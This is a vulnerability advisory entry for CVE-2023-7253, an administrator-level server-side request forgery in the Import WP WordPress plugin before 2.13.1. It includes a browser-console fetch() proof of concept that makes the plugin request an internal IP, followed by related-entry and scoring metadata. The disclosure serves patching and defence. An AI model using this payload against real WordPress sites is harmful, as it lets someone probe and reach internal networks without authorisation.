Lucene search
Mr EmpyWPEX-ID:AEEFCC01-BBBF-4D86-9CFD-EA0F9A85E1A5HistoryApr 03, 2024 - 12:00 a.m.
Import WP < 2.13.1 - Admin+ Server-side Request Forgery
2024-04-0300:00:00
Mr Empy
32
wordpress import vulnerability
server request forgery
security update
exploit disclosure
Description The plugin does not prevent users with the administrator role from pinging conducting SSRF attacks, which may be a problem in multisite configurations.
1. As an admin, create a new importer in /wp-admin/tools.php?page=importwp
2. Visit /wp-admin/admin-ajax.php?action=rest-nonce and paste the following in your browser's console, replace $IMPORTERID with the newly created importer's ID, and $TARGETLOCALIP with the local IP to probe:
fetch('/wp-json/iwp/v1/importer/$IMPORTERID/upload', {
method: 'POST',
headers: {
'X-WP-Nonce': document.body.innerHTML,
'Content-Type': 'application/x-www-form-urlencoded',
},
body: 'remote_url=http%3A%2F%2F$TARGETLOCALIP%2FSSRF_PoC&filetype=csv&action=file_remote',
credentials: 'include'
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Fetch error:', error));Related
wpvulndb
wpvulndb
Import WP < 2.13.1 - Admin+ Server-side Request Forgery
2024-04-03 00:00:00
cve
cve
CVE-2023-7253
2024-04-24 05:15:46
vulnrichment
vulnrichment
CVE-2023-7253 Import WP < 2.13.1 - Admin+ Server-side Request Forgery
2024-04-24 05:00:01
cvelist
cvelist
CVE-2023-7253 Import WP < 2.13.1 - Admin+ Server-side Request Forgery
2024-04-24 05:00:01
nvd
nvd
CVE-2023-7253
2024-04-24 05:15:46
wordfence
wordfence
6.7 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.0%
Related for WPEX-ID:AEEFCC01-BBBF-4D86-9CFD-EA0F9A85E1A5